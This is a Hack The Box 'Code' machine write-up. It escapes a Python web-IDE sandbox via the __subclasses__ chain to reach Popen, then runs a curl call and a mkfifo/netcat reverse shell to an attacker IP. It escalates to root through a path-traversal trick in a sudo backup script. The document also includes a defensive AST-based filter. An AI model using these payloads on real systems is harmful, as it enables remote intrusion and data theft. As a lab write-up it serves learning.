Code

Easy · Machine · Jul 19, 2025
#Reconnaissance #Vulnerabilities #discover-arbitrary-execution #sqlite

Arrexel

Planning

Scope

The scope of this engagement involved a simulated Black Box penetration test against a single target virtual machine hosted on the Hack The Box platform, identified as:

[Code::IP HERE]

The assessment focused on identifying vulnerabilities and achieving privilege escalation to gain both user and root access within the confines of the designated virtual environment. Activities were strictly limited to the specified machine, adhering to Hack The Box's ethical hacking guidelines and the principles of responsible disclosure.

Strategy

We will follow the plan laid out in our HTB Methodology.

We'll begin reconnaissance by making our way through HTB Methodology#1 - Port Scan, discovering any potential footholds we can later explore.

Foothold(s) identified

The potential footholds listed below were identified during our Code Reconnaissance and then explored. Next to each item is the time planned and the actual time spent on that foothold. Each item is also marked by whether or not it assisted in the vulnerabilities found in Vulnerabilities.

| Potential Vulnerability | Time Estimated | Time Spent | Verified |
| --- | --- | --- | --- |

Reconnaissance

Initial port scan

nmap/code.nmap

Python editor

Looks like we have some restrictions on our web IDE.

Gunicorn 20.0.4 vulnerability

https://huntr.com/bounties/22158e34-cfd5-41ad-97e0-a780773d96c1

Discover Arbitrary Execution - Python

After some trial and error, we saw that the Popen class was reachable and that we could run commands through it.

```python
test = ''.__class__.__base__.__subclasses__()[317](['curl','10.10.14.245:9003'])
print(test)
```


https://book.hacktricks.wiki/en/generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html?highlight=python%20__class))discover-arbitrary-execution

```python
shell= 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.245 9000 >/tmp/f'
test = ''.__class__.__base__.__subclasses__()[317](shell, shell=True)
print(test)
```
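
As an added example (not code from this write-up or from the target application), here is a defender-side screen for submitted code: it parses the source with `ast` and flags the dunder attribute chain used above, which a substring blacklist does not catch. The blacklist contents, the function names and the sample input are assumptions constructed for illustration.

```python
import ast

# Assumed substring blacklist for a web IDE (constructed for illustration;
# the write-up does not list the real filter).
BLACKLIST = ("import", "os", "subprocess", "eval", "exec", "open")

# Builtins that reach attributes or namespaces by string, so a dunder name
# assembled at run time never appears as an ast.Attribute node.
REFLECTIVE = {"getattr", "setattr", "vars", "globals", "locals", "__import__"}


def keyword_filter_allows(src: str) -> bool:
    """Naive filter: True means no blacklisted substring was found."""
    return not any(word in src for word in BLACKLIST)


def find_introspection(src: str) -> list[tuple[int, str]]:
    """Return sorted (line, name) hits for dunder attribute access and
    reflective builtin calls; unparsable input is reported as a hit."""
    try:
        tree = ast.parse(src)
    except SyntaxError as exc:
        return [(exc.lineno or 0, "syntax-error")]
    hits = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute):
            name = node.attr
            if name.startswith("__") and name.endswith("__"):
                hits.append((node.lineno, name))
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in REFLECTIVE:
                hits.append((node.lineno, node.func.id + "()"))
    return sorted(hits)


# Constructed sample: the same object-graph walk as above, with no command.
SAMPLE = "x = ''.__class__.__base__.__subclasses__()\nprint(x)"

if __name__ == "__main__":
    print("keyword filter allows:", keyword_filter_allows(SAMPLE))
    for line, name in find_introspection(SAMPLE):
        print(f"line {line}: {name}")
```

A screen like this is for rejecting and logging submissions; it is not an isolation boundary, so the interpreter still belongs in an unprivileged, confined process.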



Vulnerabilities

| Vulnerability | CVE | Recommended Patch |
| --- | --- | --- |
| [Snyk - Gunicorn 20.0.4](https://security.snyk.io/package/pip/gunicorn/20.0.4) | CVE-2024-1135 | |

Getting the User Flag


Becoming Root

sqlite Database


Then we swap to martin and have sudo access to /usr/bin/backy.sh.

We see that we can provide a JSON with a list of destinations, and with some tweaking

/home/....//root/

gives us the root.txt!